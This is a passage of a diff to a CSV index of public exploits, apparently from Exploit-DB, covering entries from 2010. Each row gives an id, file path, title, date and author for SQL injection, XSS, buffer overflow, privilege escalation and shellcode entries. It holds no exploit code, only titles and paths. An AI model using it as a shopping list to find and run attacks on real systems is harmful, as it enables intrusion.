SQL Injection Vulnerability",2010-09-05,"L0rd CrusAd3r",asp,webapps,0 14909,platforms/windows/dos/14909.py,"Virtual DJ Trial 6.1.2 SEH Buffer Overflow Crash Proof of Concept",2010-09-05,"Abhishek Lyall",windows,dos,0 14910,platforms/php/webapps/14910.txt,"Softbiz Article Directory Script (sbiz_id) Blind SQL Injection Vulnerability",2010-09-05,"BorN To K!LL",php,webapps,0 14911,platforms/php/webapps/14911.sh,"Gantry Framework 3.0.10 (Joomla) Blind SQL Injection Exploit",2010-09-05,jdc,php,webapps,0 -14913,platforms/asp/webapps/14913.txt,"DMXReady Members Area Manager Persistent XSS Vulnerability",2010-09-06,"L0rd CrusAd3r",asp,webapps,0 +14932,platforms/windows/webapps/14932.py,"ColdCalendar 2.06 SQL Injection Exploit",2010-09-07,mr_me,windows,webapps,0 14914,platforms/asp/webapps/14914.txt,"Micronetsoft RV Dealer Website SQL Injection Vulnerability",2010-09-06,"L0rd CrusAd3r",asp,webapps,0 14915,platforms/php/webapps/14915.txt,"interphoto gallery - Multiple Vulnerabilities",2010-09-06,Abysssec,php,webapps,0 14916,platforms/windows/dos/14916.py,"HP OpenView NNM - webappmon.exe execvp_nc Remote Code Execution",2010-09-06,Abysssec,windows,dos,0 14919,platforms/asp/webapps/14919.txt,"Micronetsoft Rental Property Management Website SQL Injection Vulnerability",2010-09-06,"L0rd CrusAd3r",asp,webapps,0 14922,platforms/php/webapps/14922.txt,"Joomla Component Aardvertiser 2.1 Free Blind SQL Injection Vulnerability",2010-09-06,"Stephan Sattler",php,webapps,0 14923,platforms/php/webapps/14923.txt,"Wordpress Events Manager Extended Plugin Persistent XSS Vulnerability",2010-09-06,Craw,php,webapps,0 +14931,platforms/php/webapps/14931.php,"java Bridge 5.5 - Directory Traversal Vulnerability",2010-09-07,Saxtor,php,webapps,0 14925,platforms/linux/remote/14925.txt,"weborf <= 0.12.2 - Directory Traversal Vulnerability",2010-09-07,Rew,linux,remote,0 14927,platforms/php/webapps/14927.txt,"dynpage <= 1.0 - Multiple Vulnerabilities (0day)",2010-09-07,Abysssec,php,webapps,0 14928,platforms/novell/dos/14928.py,"Novell Netware - NWFTPD RMD/RNFR/DELE Argument Parsing Buffer Overflow",2010-09-07,Abysssec,novell,dos,0 -14931,platforms/php/webapps/14931.php,"java Bridge 5.5 - Directory Traversal Vulnerability",2010-09-07,Saxtor,php,webapps,0 -14932,platforms/windows/webapps/14932.py,"ColdCalendar 2.06 SQL Injection Exploit",2010-09-07,mr_me,windows,webapps,0 14933,platforms/windows/webapps/14933.txt,"ColdBookmarks 1.22 SQL Injection Vulnerability",2010-09-07,mr_me,windows,webapps,0 14934,platforms/windows/webapps/14934.txt,"ColdOfficeView 2.04 - Multiple Blind SQL Injection Vulnerabilities",2010-09-07,mr_me,windows,webapps,0 14935,platforms/windows/webapps/14935.py,"ColdUserGroup 1.06 - Blind SQL Injection Exploit",2010-09-07,mr_me,windows,webapps,0 +14942,platforms/php/webapps/14942.txt,"1024 CMS 2.1.1 - Blind SQL Injection Vulnerability",2010-09-07,"Stephan Sattler",php,webapps,0 14937,platforms/windows/dos/14937.py,"QQPlayer 2.3.696.400p1 - (.wav) Denial of Service Vulnerability",2010-09-07,s-dz,windows,dos,0 14938,platforms/windows/dos/14938.txt,"Internet Download Accelerator 5.8 - Remote Buffer Overflow PoC",2010-09-07,eidelweiss,windows,dos,0 -14941,platforms/win32/remote/14941.rb,"Integard Home and Pro 2 - Remote HTTP Buffer Overflow Exploit",2010-09-07,"Lincoln, Nullthreat, rick2600",win32,remote,80 -14942,platforms/php/webapps/14942.txt,"1024 CMS 2.1.1 - Blind SQL Injection Vulnerability",2010-09-07,"Stephan Sattler",php,webapps,0 14943,platforms/asp/webapps/14943.txt,"sirang web-based d-control Multiple Vulnerabilities",2010-09-08,Abysssec,asp,webapps,0 +14941,platforms/win32/remote/14941.rb,"Integard Home and Pro 2 - Remote HTTP Buffer Overflow Exploit",2010-09-07,"Lincoln, Nullthreat, rick2600",win32,remote,80 14944,platforms/windows/local/14944.py,"Microsoft Office Visio DXF File Stack based Overflow",2010-09-08,Abysssec,windows,local,0 14947,platforms/bsd/dos/14947.txt,"FreeBSD 8.1/7.3 vm.pmap Kernel Local Race Condition",2010-09-08,"Maksymilian Arciemowicz",bsd,dos,0 -14948,platforms/php/webapps/14948.txt,"festos CMS 2.3b - Multiple Vulnerabilities",2010-09-09,Abysssec,php,webapps,0 14949,platforms/windows/dos/14949.py,"Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability",2010-09-09,Abysssec,windows,dos,0 14952,platforms/php/webapps/14952.txt,"Visitors Google Map Lite 1.0.1 (FREE) module mod_visitorsgooglemap SQL Injection",2010-09-09,"Chip d3 bi0s",php,webapps,0 14954,platforms/asp/webapps/14954.txt,"aradblog - Multiple Vulnerabilities",2010-09-09,Abysssec,asp,webapps,0 +14966,platforms/windows/local/14966.py,"Excel RTD - Memory Corruption",2010-09-10,Abysssec,windows,local,0 +15442,platforms/php/webapps/15442.txt,"Zeeways Adserver Multiple Vulnerabilities",2010-11-06,Valentin,php,webapps,0 +15443,platforms/php/webapps/15443.txt,"RSform! 1.0.5 (Joomla) Multiple Vulnerabilities",2010-11-06,jdc,php,webapps,0 14959,platforms/windows/local/14959.py,"Acoustica MP3 Audio Mixer 2.471 Extended M3U directives SEH",2010-09-09,"Carlos Mario Penagos Hollmann",windows,local,0 14960,platforms/php/webapps/14960.txt,"ES Simple Download 1.0. Local File Inclusion Vulnerability",2010-09-09,Kazza,php,webapps,0 14961,platforms/win32/local/14961.py,"Audiotran 1.4.2.4 SEH Overflow Exploit",2010-09-09,"Abhishek Lyall",win32,local,0 14962,platforms/multiple/webapps/14962.txt,"CS Cart 1.3.3 - (install.php) Cross-Site Scripting Vulnerability",2010-09-09,crmpays,multiple,webapps,80 14964,platforms/php/webapps/14964.txt,"Joomla Component (com_jphone) Local File Inclusion Vulnerability",2010-09-10,"Chip d3 bi0s",php,webapps,0 14965,platforms/php/webapps/14965.txt,"fcms 2.2.3 - Remote File Inclusion Vulnerability",2010-09-10,LoSt.HaCkEr,php,webapps,0 -14966,platforms/windows/local/14966.py,"Excel RTD - Memory Corruption",2010-09-10,Abysssec,windows,local,0 14967,platforms/windows/dos/14967.txt,"Webkit (Apple Safari < 4.1.2/5.0.2 & Google Chrome < 5.0.375.125) - Memory Corruption",2010-09-10,"Jose A. Vazquez",windows,dos,0 14968,platforms/php/webapps/14968.txt,"symphony 2.0.7 - Multiple Vulnerabilities",2010-09-10,JosS,php,webapps,0 14969,platforms/asp/webapps/14969.txt,"ASP Nuke - SQL Injection Vulnerability",2010-09-11,Abysssec,asp,webapps,0 @@ -13047,6 +13082,7 @@ id,file,description,date,author,platform,type,port 14998,platforms/php/webapps/14998.txt,"Joomla Component (com_jgen) SQL Injection Vulnerability",2010-09-14,**RoAd_KiLlEr**,php,webapps,0 14999,platforms/asp/webapps/14999.txt,"freediscussionforums 1.0 - Multiple Vulnerabilities",2010-09-14,Abysssec,asp,webapps,0 15001,platforms/windows/remote/15001.html,"Novell iPrint Client Browser Plugin - ExecuteRequest debug Stack Overflow",2010-09-14,Abysssec,windows,remote,0 +15042,platforms/windows/remote/15042.py,"Novell iPrint Client Browser Plugin - call-back-url Stack Overflow",2010-09-19,Abysssec,windows,remote,0 15004,platforms/php/webapps/15004.pl,"E-Xoopport - Samsara <= 3.1 - (Sections Module) Remote Blind SQL Injection Exploit",2010-09-14,_mRkZ_,php,webapps,0 15005,platforms/multiple/remote/15005.txt,"IBM Lotus Domino iCalendar Email Address Stack Buffer Overflow Vulnerability",2010-09-14,"A. Plaskett",multiple,remote,0 15006,platforms/php/webapps/15006.txt,"eNdonesia 8.4 - SQL Injection Vulnerability",2010-09-15,vYc0d,php,webapps,0 @@ -13061,6 +13097,7 @@ id,file,description,date,author,platform,type,port 15022,platforms/windows/local/15022.py,"Honestech VHS to DVD <= 3.0.30 Deluxe Local Buffer Overflow (SEH)",2010-09-16,"Brennon Thomas",windows,local,0 15023,platforms/linux/local/15023.c,"Linux Kernel < 2.6.36-rc4-git2 - x86_64 ia32syscall Emulation Privilege Escalation",2010-09-16,"ben hawkes",linux,local,0 15024,platforms/linux/local/15024.c,"Linux Kernel 2.6.27 < 2.6.36 - x86_64 compat Local Root Exploit",2010-09-16,Ac1dB1tCh3z,linux,local,0 +15193,platforms/windows/dos/15193.pl,"Hanso Player 1.3.0 - (.m3u) Denial of Service Vulnerability",2010-10-03,"xsploited security",windows,dos,0 15026,platforms/windows/local/15026.py,"BACnet OPC Client Buffer Overflow Exploit",2010-09-16,"Jeremy Brown",windows,local,0 15027,platforms/windows/dos/15027.py,"Firefox Plugin Parameter EnsureCachedAttrParamArrays - Remote Code Execution",2010-09-17,Abysssec,windows,dos,0 15029,platforms/php/webapps/15029.txt,"phpmyfamily - Multiple Vulnerabilities",2010-09-17,Abysssec,php,webapps,0 @@ -13073,13 +13110,14 @@ id,file,description,date,author,platform,type,port 15039,platforms/php/webapps/15039.txt,"xt:Commerce Gambio 2008 - 2010 ERROR Based SQL Injection ""reviews.php""",2010-09-18,secret,php,webapps,0 15040,platforms/php/webapps/15040.txt,"Joomla Component (com_restaurantguide) Multiple Vulnerabilities",2010-09-18,Valentin,php,webapps,0 15041,platforms/php/webapps/15041.py,"Maian Gallery 2 - Local File Download Vulnerability",2010-09-18,mr_me,php,webapps,0 -15042,platforms/windows/remote/15042.py,"Novell iPrint Client Browser Plugin - call-back-url Stack Overflow",2010-09-19,Abysssec,windows,remote,0 15044,platforms/asp/webapps/15044.txt,"jmd-cms - Multiple Vulnerabilities",2010-09-19,Abysssec,asp,webapps,0 15046,platforms/php/webapps/15046.txt,"Fashione E-Commerce Webshop Multiple SQL Injection Vulnerability",2010-09-19,secret,php,webapps,0 15047,platforms/windows/local/15047.rb,"Audiotran 1.4.2.4 SEH Overflow Exploit (DEP Bypass)",2010-09-19,"Muhamad Fadzil Ramli",windows,local,0 15048,platforms/windows/remote/15048.txt,"smartermail 7.1.3876 - Directory Traversal Vulnerability",2010-09-19,sqlhacker,windows,remote,0 15049,platforms/php/webapps/15049.txt,"BoutikOne 1.0 - SQL Injection Vulnerability",2010-09-19,BrOx-Dz,php,webapps,0 15050,platforms/php/webapps/15050.txt,"Opencart 1.4.9.1 - Remote File Upload Vulnerability",2010-09-19,Net.Edit0r,php,webapps,0 +15100,platforms/win32/webapps/15100.txt,"Joomla Component (com_elite_experts) SQL Injection Vulnerability",2010-09-24,**RoAd_KiLlEr**,win32,webapps,80 +15099,platforms/windows/local/15099.rb,"SnackAmp 3.1.3B - SMP Buffer Overflow Vulnerability (SEH)",2010-09-24,"James Fitts",windows,local,0 15054,platforms/linux/dos/15054.rb,"RarCrack 0.2 - Buffer Overflow Proof Of Concept",2010-09-19,The_UnKn@wn,linux,dos,0 15056,platforms/windows/remote/15056.py,"Java CMM readMabCurveData - Stack Overflow",2010-09-20,Abysssec,windows,remote,0 15058,platforms/asp/webapps/15058.html,"VWD-CMS - CSRF Vulnerability",2010-09-20,Abysssec,asp,webapps,0 @@ -13104,6 +13142,7 @@ id,file,description,date,author,platform,type,port 15082,platforms/php/webapps/15082.txt,"BSI Hotel Booking System Admin 1.4 & 2.0 - Login Bypass Vulnerability",2010-09-22,K-159,php,webapps,0 15084,platforms/php/webapps/15084.txt,"Joomla TimeTrack Component 1.2.4 - Component Multiple SQL Injection Vulnerabilities",2010-09-22,"Salvatore Fresta",php,webapps,0 15085,platforms/php/webapps/15085.txt,"Joomla Component (com_ezautos) SQL Injection Vulnerability",2010-09-22,Gamoscu,php,webapps,0 +15112,platforms/windows/dos/15112.py,"Microsoft Cinepak Codec CVDecompress - Heap Overflow",2010-09-26,Abysssec,windows,dos,0 15086,platforms/multiple/dos/15086.py,"Adobe Acrobat Reader and Flash - 'newfunction' Remote Code Execution Vulnerability",2010-09-23,Abysssec,multiple,dos,0 15088,platforms/windows/dos/15088.txt,"Microsoft Excel - HFPicture Record Parsing Memory Corruption (0day)",2010-09-23,Abysssec,windows,dos,0 15090,platforms/php/webapps/15090.txt,"WAnewsletter 2.1.2 - SQL Injection Vulnerability",2010-09-23,BrOx-Dz,php,webapps,0 @@ -13113,33 +13152,32 @@ id,file,description,date,author,platform,type,port 15094,platforms/windows/local/15094.py,"Microsoft Excel - OBJ Record Stack Overflow",2010-09-24,Abysssec,windows,local,0 15096,platforms/windows/dos/15096.py,"Microsoft MPEG Layer-3 Audio Decoder Division By Zero",2010-09-24,Abysssec,windows,dos,0 15098,platforms/php/webapps/15098.txt,"FreePBX <= 2.8.0 Recordings Interface Allows Remote Code Execution",2010-09-24,"Trustwave's SpiderLabs",php,webapps,0 -15099,platforms/windows/local/15099.rb,"SnackAmp 3.1.3B - SMP Buffer Overflow Vulnerability (SEH)",2010-09-24,"James Fitts",windows,local,0 -15100,platforms/win32/webapps/15100.txt,"Joomla Component (com_elite_experts) SQL Injection Vulnerability",2010-09-24,**RoAd_KiLlEr**,win32,webapps,80 +15114,platforms/php/webapps/15114.php,"Zenphoto - Config Update and Command Execute Vulnerability",2010-09-26,Abysssec,php,webapps,0 15102,platforms/win32/webapps/15102.txt,"Traidnt UP - Cross-Site Request Forgery Add Admin Account",2010-09-24,"John Johnz",win32,webapps,80 15103,platforms/windows/dos/15103.py,"VMware Workstation <= 7.1.1 VMkbd.sys Denial of Service Exploit",2010-09-25,"Lufeng Li",windows,dos,0 15104,platforms/windows/dos/15104.py,"Mozilla Firefox CSS - font-face Remote Code Execution Vulnerability",2010-09-25,Abysssec,windows,dos,0 15106,platforms/asp/webapps/15106.txt,"VisualSite CMS 1.3 - Multiple Vulnerabilities",2010-09-25,Abysssec,asp,webapps,0 -15110,platforms/php/webapps/15110.txt,"E-Xoopport - Samsara <= 3.1 - (eCal module) Blind SQL Injection Exploit",2010-09-25,_mRkZ_,php,webapps,0 -15112,platforms/windows/dos/15112.py,"Microsoft Cinepak Codec CVDecompress - Heap Overflow",2010-09-26,Abysssec,windows,dos,0 -15114,platforms/php/webapps/15114.php,"Zenphoto - Config Update and Command Execute Vulnerability",2010-09-26,Abysssec,php,webapps,0 -15116,platforms/windows/shellcode/15116.cpp,"Windows Mobile 6.5 TR (WinCE 5.2) MessageBox Shellcode (ARM)",2010-09-26,"Celil nver",windows,shellcode,0 +15116,platforms/windows/shellcode/15116.cpp,"Windows Mobile 6.5 TR (WinCE 5.2) MessageBox Shellcode (ARM)",2010-09-26,"Celil Ünüver",windows,shellcode,0 +15157,platforms/php/webapps/15157.txt,"je guestbook 1.0 joomla component Multiple Vulnerabilities",2010-09-30,"Salvatore Fresta",php,webapps,0 15118,platforms/asp/webapps/15118.txt,"gokhun asp stok 1.0 - Multiple Vulnerabilities",2010-09-26,KnocKout,asp,webapps,0 15119,platforms/php/webapps/15119.txt,"PEEL Premium 5.71 SQL Injection Vulnerability",2010-09-26,KnocKout,php,webapps,0 +15110,platforms/php/webapps/15110.txt,"E-Xoopport - Samsara <= 3.1 - (eCal module) Blind SQL Injection Exploit",2010-09-25,_mRkZ_,php,webapps,0 15120,platforms/cfm/webapps/15120.txt,"Blue River Mura CMS Directory Traversal",2010-09-26,mr_me,cfm,webapps,0 15121,platforms/php/webapps/15121.txt,"pbboard 2.1.1 - Multiple Vulnerabilities",2010-09-27,JIKO,php,webapps,0 15122,platforms/windows/dos/15122.html,"Microsoft Internet Explorer - MSHTML Findtext Processing Issue",2010-09-27,Abysssec,windows,dos,0 15124,platforms/asp/webapps/15124.txt,"ndCMS - SQL Injection Vulnerability",2010-09-27,Abysssec,asp,webapps,0 15126,platforms/php/webapps/15126.txt,"Entrans SQL Injection Vulnerablility",2010-09-27,keracker,php,webapps,0 -15128,platforms/win32/webapps/15128.txt,"Allpc 2.5 osCommerce SQL/XSS Multiple Vulnerabilities",2010-09-27,**RoAd_KiLlEr**,win32,webapps,80 15130,platforms/cgi/webapps/15130.sh,"Barracuda Networks Spam & Virus Firewall <= 4.1.1.021 - Remote Configuration Retrieval",2010-09-27,ShadowHatesYou,cgi,webapps,0 15131,platforms/windows/dos/15131.txt,"Fox Audio Player 0.8.0 - (.m3u) Denial of Service Vulnerability",2010-09-27,4n0nym0us,windows,dos,0 15133,platforms/windows/local/15133.pl,"iworkstation 9.3.2.1.4 - seh Exploit",2010-09-27,"sanjeev gupta",windows,local,0 15134,platforms/windows/local/15134.rb,"Digital Music Pad 8.2.3.3.4 - SEH Overflow Metasploit Module",2010-09-27,"Abhishek Lyall",windows,local,0 +15128,platforms/win32/webapps/15128.txt,"Allpc 2.5 osCommerce SQL/XSS Multiple Vulnerabilities",2010-09-27,**RoAd_KiLlEr**,win32,webapps,80 +15198,platforms/php/webapps/15198.txt,"Aprox CMS Engine 6.0 - Multiple Vulnerabilities",2010-10-03,"Stephan Sattler",php,webapps,0 15135,platforms/php/webapps/15135.txt,"Car Portal 2.0 - BLIND SQL Injection Vulnerability",2010-09-27,**RoAd_KiLlEr**,php,webapps,0 -15136,platforms/windows/shellcode/15136.cpp,"Windows Mobile 6.5 TR Phone Call Shellcode",2010-09-27,"Celil nver",windows,shellcode,0 +15136,platforms/windows/shellcode/15136.cpp,"Windows Mobile 6.5 TR Phone Call Shellcode",2010-09-27,"Celil Ünüver",windows,shellcode,0 +15143,platforms/php/webapps/15143.txt,"e107 0.7.23 - SQL Injection Vulnerability.",2010-09-28,"High-Tech Bridge SA",php,webapps,0 15139,platforms/asp/webapps/15139.txt,"AtomatiCMS - Upload Arbitrary File Vulnerability",2010-09-28,Abysssec,asp,webapps,0 15141,platforms/php/webapps/15141.txt,"JE CMS 1.0.0 - Bypass Authentication by SQL Injection Vulnerability",2010-09-28,Abysssec,php,webapps,0 -15143,platforms/php/webapps/15143.txt,"e107 0.7.23 - SQL Injection Vulnerability.",2010-09-28,"High-Tech Bridge SA",php,webapps,0 15144,platforms/windows/webapps/15144.txt,"Aleza Portal 1.6 - Insecure (SQLi) Cookie Handling",2010-09-28,KnocKout,windows,webapps,0 15145,platforms/php/webapps/15145.txt,"Achievo 1.4.3 - Multiple Authorization Flaws",2010-09-28,"Pablo Milano",php,webapps,0 15146,platforms/php/webapps/15146.txt,"Achievo 1.4.3 - CSRF Vulnerability",2010-09-28,"Pablo Milano",php,webapps,0 @@ -13152,7 +13190,6 @@ id,file,description,date,author,platform,type,port 15154,platforms/php/webapps/15154.txt,"MyPhpAuction 2010 (id) Remote SQL Injection Vuln",2010-09-29,"BorN To K!LL",php,webapps,0 15155,platforms/linux/local/15155.c,"XFS Deleted Inode Local Information Disclosure Vulnerability",2010-09-29,"Red Hat",linux,local,0 15156,platforms/windows/local/15156.py,"Quick Player 1.3 Unicode SEH Exploit",2010-09-29,"Abhishek Lyall",windows,local,0 -15157,platforms/php/webapps/15157.txt,"je guestbook 1.0 joomla component Multiple Vulnerabilities",2010-09-30,"Salvatore Fresta",php,webapps,0 15158,platforms/windows/dos/15158.py,"Microsoft Unicode Scripts Processor - Remote Code Execution",2010-09-30,Abysssec,windows,dos,0 15160,platforms/asp/webapps/15160.txt,"ASPMass Shopping Cart - Vulnerability File Upload CSRF",2010-09-30,Abysssec,asp,webapps,0 15162,platforms/php/webapps/15162.rb,"Joomla JE Job Component SQL Injection Vulnerability",2010-09-30,"Easy Laster",php,webapps,0 @@ -13163,22 +13200,20 @@ id,file,description,date,author,platform,type,port 15167,platforms/windows/dos/15167.txt,"Microsoft IIS 6.0 ASP Stack Overflow (Stack Exhaustion) Denial of Service (MS10-065)",2010-10-01,kingcope,windows,dos,0 15168,platforms/windows/remote/15168.rb,"Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution (MSF)",2010-10-01,Trancer,windows,remote,0 15169,platforms/php/webapps/15169.txt,"Evaria Content Management System 1.1 File Disclosure Vulnerability",2010-10-01,"khayeye shotor",php,webapps,0 -15171,platforms/php/webapps/15171.txt,"jCart 1.1 - Multiple XSS/CSRF/Open Redirect Vulnerabilities",2010-10-01,p0deje,php,webapps,0 -15173,platforms/php/webapps/15173.txt,"phpMyShopping 1.0.1505 - Multiple Vulnerabilities",2010-10-01,Metropolis,php,webapps,0 15174,platforms/php/webapps/15174.txt,"tiki wiki CMS groupware 5.2 - Multiple Vulnerabilities",2010-10-01,"John Leitch",php,webapps,0 +15173,platforms/php/webapps/15173.txt,"phpMyShopping 1.0.1505 - Multiple Vulnerabilities",2010-10-01,Metropolis,php,webapps,0 +15171,platforms/php/webapps/15171.txt,"jCart 1.1 - Multiple XSS/CSRF/Open Redirect Vulnerabilities",2010-10-01,p0deje,php,webapps,0 15175,platforms/php/webapps/15175.txt,"Chipmunk Board 1.3 (index.php?forumID) SQL Injection",2010-10-01,Shamus,php,webapps,0 -15177,platforms/php/webapps/15177.pl,"iGaming CMS <= 1.5 - Blind SQL Injection",2010-10-01,plucky,php,webapps,0 +15199,platforms/asp/webapps/15199.py,"Cilem Haber 1.4.4 (Tr) - Database Disclosure Exploit (.py)",2010-10-04,ZoRLu,asp,webapps,0 15183,platforms/asp/webapps/15183.py,"Bka Haber 1.0 (Tr) - File Disclosure Exploit",2010-10-02,ZoRLu,asp,webapps,0 +15177,platforms/php/webapps/15177.pl,"iGaming CMS <= 1.5 - Blind SQL Injection",2010-10-01,plucky,php,webapps,0 15184,platforms/windows/local/15184.c,"AudioTran 1.4.2.4 SafeSEH+SEHOP Exploit",2010-10-02,x90c,windows,local,0 15185,platforms/asp/webapps/15185.txt,"SmarterMail 7.x (7.2.3925) - Stored Cross-Site Scripting Vulnerability",2010-10-02,sqlhacker,asp,webapps,0 15186,platforms/ios/remote/15186.txt,"iOS FileApp < 2.0 - Directory Traversal Vulnerability",2010-10-02,m0ebiusc0de,ios,remote,0 15188,platforms/ios/dos/15188.py,"iOS FileApp < 2.0 - FTP Remote Denial of Service Exploit",2010-10-02,m0ebiusc0de,ios,dos,0 15189,platforms/asp/webapps/15189.txt,"SmarterMail 7.x (7.2.3925) LDAP Injection Vulnerability",2010-10-02,sqlhacker,asp,webapps,0 15191,platforms/asp/webapps/15191.txt,"TradeMC E-Ticaret SQL and XSS Multiple Vulnerabilities",2010-10-02,KnocKout,asp,webapps,0 -15193,platforms/windows/dos/15193.pl,"Hanso Player 1.3.0 - (.m3u) Denial of Service Vulnerability",2010-10-03,"xsploited security",windows,dos,0 15194,platforms/php/webapps/15194.txt,"TinyMCE MCFileManager 2.1.2 - Arbitrary File Upload Vulnerability",2010-10-03,Hackeri-AL,php,webapps,0 -15198,platforms/php/webapps/15198.txt,"Aprox CMS Engine 6.0 - Multiple Vulnerabilities",2010-10-03,"Stephan Sattler",php,webapps,0 -15199,platforms/asp/webapps/15199.py,"Cilem Haber 1.4.4 (Tr) - Database Disclosure Exploit (.py)",2010-10-04,ZoRLu,asp,webapps,0 15200,platforms/php/webapps/15200.txt,"FAQMasterFlex 1.2 - SQL Injection Vulnerability",2010-10-04,cyb3r.anbu,php,webapps,0 15201,platforms/windows/local/15201.rb,"SnackAmp 3.1.3B - SMP Buffer Overflow Vulnerability (SEH - DEP BYPASS)",2010-10-04,"Muhamad Fadzil Ramli",windows,local,0 15202,platforms/windows/shellcode/15202.c,"win32/xp pro sp3 (EN) 32-bit - add new local administrator 113 bytes",2010-10-04,"Anastasios Monachos",windows,shellcode,0 @@ -13194,6 +13229,8 @@ id,file,description,date,author,platform,type,port 15213,platforms/asp/remote/15213.pl,"ASP.NET Padding Oracle Vulnerability (MS10-070)",2010-10-06,"Giorgio Fedon",asp,remote,0 15214,platforms/win32/dos/15214.py,"HP Data Protector Media Operations NULL Pointer Dereference Remote DoS",2010-10-06,d0lc3,win32,dos,19813 15215,platforms/multiple/dos/15215.txt,"Multiple Vendors libc/glob(3) Resource Exhaustion (+0day Remote ftpd-anon)",2010-10-07,"Maksymilian Arciemowicz",multiple,dos,0 +15285,platforms/linux/local/15285.c,"Linux Kernel <= 2.6.36-rc8 - RDS Protocol Local Privilege Escalation",2010-10-19,"Dan Rosenberg",linux,local,0 +15284,platforms/php/webapps/15284.txt,"phpCheckZ 1.1.0 - Blind SQL Injection Vulnerability",2010-10-19,"Salvatore Fresta",php,webapps,0 15217,platforms/php/webapps/15217.txt,"Feindura File Manager 1.0(rc) - Remote File Upload",2010-10-07,KnocKout,php,webapps,0 15218,platforms/asp/webapps/15218.txt,"xWeblog 2.2 - (oku.asp?makale_id) SQL Injection Vulnerability",2010-10-07,KnocKout,asp,webapps,0 15219,platforms/asp/webapps/15219.py,"xWeblog 2.2 - (arsiv.asp tarih) SQL Injection Exploit",2010-10-08,ZoRLu,asp,webapps,0 @@ -13202,7 +13239,21 @@ id,file,description,date,author,platform,type,port 15223,platforms/php/webapps/15223.txt,"Chipmunk Pwngame Multiple SQL Injection Vulnerabilities",2010-10-09,KnocKout,php,webapps,0 15224,platforms/php/webapps/15224.txt,"js calendar 1.5.1 joomla component Multiple Vulnerabilities",2010-10-09,"Salvatore Fresta",php,webapps,0 15225,platforms/php/webapps/15225.txt,"videodb <= 3.0.3 - Multiple Vulnerabilities",2010-10-09,Valentin,php,webapps,0 +15268,platforms/php/webapps/15268.txt,"WikiWebHelp <= 0.3.3 Insecure Cookie Handling Vulnerability",2010-10-17,FuRty,php,webapps,0 +15269,platforms/php/webapps/15269.txt,"Tastydir <= 1.2 (1216) Multiple Vulnerabilities",2010-10-17,R,php,webapps,0 15227,platforms/php/webapps/15227.txt,"PHP-Fusion MG User-Fotoalbum SQL Injection Vulnerability",2010-10-10,"Easy Laster",php,webapps,0 +15592,platforms/php/webapps/15592.txt,"sahitya graphics CMS - Multiple Vulnerabilities",2010-11-21,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 +15593,platforms/php/webapps/15593.html,"Cpanel 11.x - Edit E-mail Cross-Site Request Forgery Exploit",2010-11-21,"Mon7rF .",php,webapps,0 +15594,platforms/php/webapps/15594.txt,"AuraCMS - (pfd.php) SQL Injection Vulnerability",2010-11-22,"Don Tukulesto",php,webapps,0 +15595,platforms/php/webapps/15595.txt,"jSchool Advanced Blind SQL Injection Vulnerability",2010-11-22,"Don Tukulesto",php,webapps,0 +15596,platforms/jsp/webapps/15596.txt,"JCMS 2010 file download Vulnerability",2010-11-22,Beach,jsp,webapps,0 +15597,platforms/asp/webapps/15597.txt,"Acidcat CMS 3.3 - (fckeditor) Shell Upload Vulnerability",2010-11-22,Net.Edit0r,asp,webapps,0 +15598,platforms/windows/dos/15598.pl,"Xion Audio Player 1.0.126 - (.m3u8) Buffer Overflow Vulnerability",2010-11-23,anT!-Tr0J4n,windows,dos,0 +15599,platforms/windows/local/15599.py,"Xion Audio Player 1.0.127 - (m3u) Buffer Overflow Vulnerability",2010-11-23,0v3r,windows,local,0 +15600,platforms/windows/remote/15600.html,"Netcraft Toolbar 1.8.1 - Remote Code Execution Exploit",2010-11-23,Rew,windows,remote,0 +15601,platforms/windows/remote/15601.html,"ImageShack Toolbar 4.8.3.75 - Remote Code Execution Exploit",2010-11-23,Rew,windows,remote,0 +15602,platforms/php/webapps/15602.txt,"PHPMotion FCKeditor File Upload Vulnerability",2010-11-23,trycyber,php,webapps,0 +15605,platforms/php/webapps/15605.txt,"GetSimple CMS 2.01 and 2.02 Administrative Credentials Disclosure",2010-11-24,"Michael Brooks",php,webapps,0 15229,platforms/windows/dos/15229.pl,"FoxPlayer 2.3.0 - (.m3u) Buffer Overflow Vulnerability",2010-10-10,"Anastasios Monachos",windows,dos,0 15230,platforms/asp/webapps/15230.txt,"Site2Nite Auto e-Manager SQL Injection Vulnerability",2010-10-10,KnocKout,asp,webapps,0 15231,platforms/windows/remote/15231.py,"Sync Breeze Server 2.2.30 - Remote Buffer Overflow Exploit",2010-10-11,"xsploited security",windows,remote,0 @@ -13210,6 +13261,8 @@ id,file,description,date,author,platform,type,port 15233,platforms/php/webapps/15233.txt,"BaconMap 1.0 - SQL Injection Vulnerability",2010-10-11,"John Leitch",php,webapps,0 15234,platforms/php/webapps/15234.txt,"BaconMap 1.0 - Local File Disclosure Vulnerability",2010-10-11,"John Leitch",php,webapps,0 15235,platforms/windows/remote/15235.html,"AoA Audio Extractor 2.x - ActiveX ROP Exploit",2010-10-11,mr_me,windows,remote,0 +15606,platforms/php/webapps/15606.txt,"phpvidz 0.9.5 Administrative Credentials Disclosure",2010-11-24,"Michael Brooks",php,webapps,0 +15607,platforms/php/webapps/15607.txt,"WSN Links SQL Injection Vulnerability",2010-11-24,"Mark Stanislav",php,webapps,0 15237,platforms/php/webapps/15237.txt,"AdaptCMS 2.0.1 Beta Release Remote File Inclusion Vulnerability (msf)",2010-10-12,v3n0m,php,webapps,0 15238,platforms/windows/remote/15238.py,"Disk Pulse Server 2.2.34 - Remote Buffer Overflow Exploit",2010-10-12,"xsploited security",windows,remote,0 15239,platforms/php/webapps/15239.html,"WikiWebHelp 0.3.3 - Cross-Site Request Forgery Vulnerability",2010-10-12,Yoyahack,php,webapps,0 @@ -13224,6 +13277,9 @@ id,file,description,date,author,platform,type,port 15249,platforms/php/webapps/15249.txt,"Data/File upload and management Arbitrary File Upload Vulnerability",2010-10-14,saudi0hacker,php,webapps,0 15250,platforms/windows/dos/15250.py,"Ease Jukebox 1.30 - Denial of Service Vulnerability",2010-10-14,Sweet,windows,dos,0 15251,platforms/php/webapps/15251.txt,"Xlrstats 2.0.1 - SQL Injection Vulnerability",2010-10-14,Sky4,php,webapps,0 +15608,platforms/php/webapps/15608.txt,"Free Simple Software SQL Injection Vulnerability",2010-11-24,"Mark Stanislav",php,webapps,0 +15263,platforms/windows/dos/15263.py,"ConvexSoft DJ Audio Mixer - Denial of Service Vulnerability",2010-10-16,"MOHAMED ABDI",windows,dos,0 +15264,platforms/aix/dos/15264.py,"PHP Hosting 